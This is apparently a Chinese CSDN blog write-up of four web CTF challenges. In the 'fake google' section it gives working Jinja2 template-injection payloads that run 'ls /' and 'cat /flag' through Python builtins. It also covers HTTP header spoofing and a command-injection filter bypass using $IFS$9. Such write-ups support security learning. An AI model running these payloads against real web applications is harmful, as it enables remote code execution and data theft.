本篇內容
[BJDCTF 2nd]fake google
[極客大挑戰 2019]Http
[De1CTF 2019]SSRF Me
[GXYCTF2019]Ping Ping Ping
[BJDCTF 2nd]fake google
直接在搜索框回車,然後右鍵查看源代碼:
嘗試模板注入成功:
直接上手payload看看根路徑下的文件:
{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].eval("__import__('os').popen('ls /').read()") }}{% endif %}{% endfor %}
看到了flag,cat一下:
{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].eval("__import__('os').popen('cat /flag').read()") }}{% endif %}{% endfor %}
[極客大挑戰 2019]Http
直接右鍵源代碼:
既然要來自https://www.Sycsecret.com
,那就在Header信息里加Referer:
要使用Syclover
瀏覽器,改:
要本地才能讀,改:
拿到最終flag。
[De1CTF 2019]SSRF Me
本人對這題見解不深刻,講解不好,直接放大佬博客:[De1CTF 2019]SSRF Me之愚見。
[GXYCTF2019]Ping Ping Ping
老套路了,直接嘗試:
看到flag.php
,嘗試讀取:
嘗試一番後發現,回顯/?ip= 1fxck your symbol!
表示出現了非法字符,發現能代替空格的諸如/**/、%0a、${IFS}
等都被過濾了,但$IFS$9
還可以使用。
右鍵查看源代碼,發現最終flag。
========================================================
上一篇-----------------------------------目錄 -----------------------------------下一篇
========================================================
轉載請註明出處。
本文網址:https://blog.csdn.net/hiahiachang/article/details/105431422
========================================================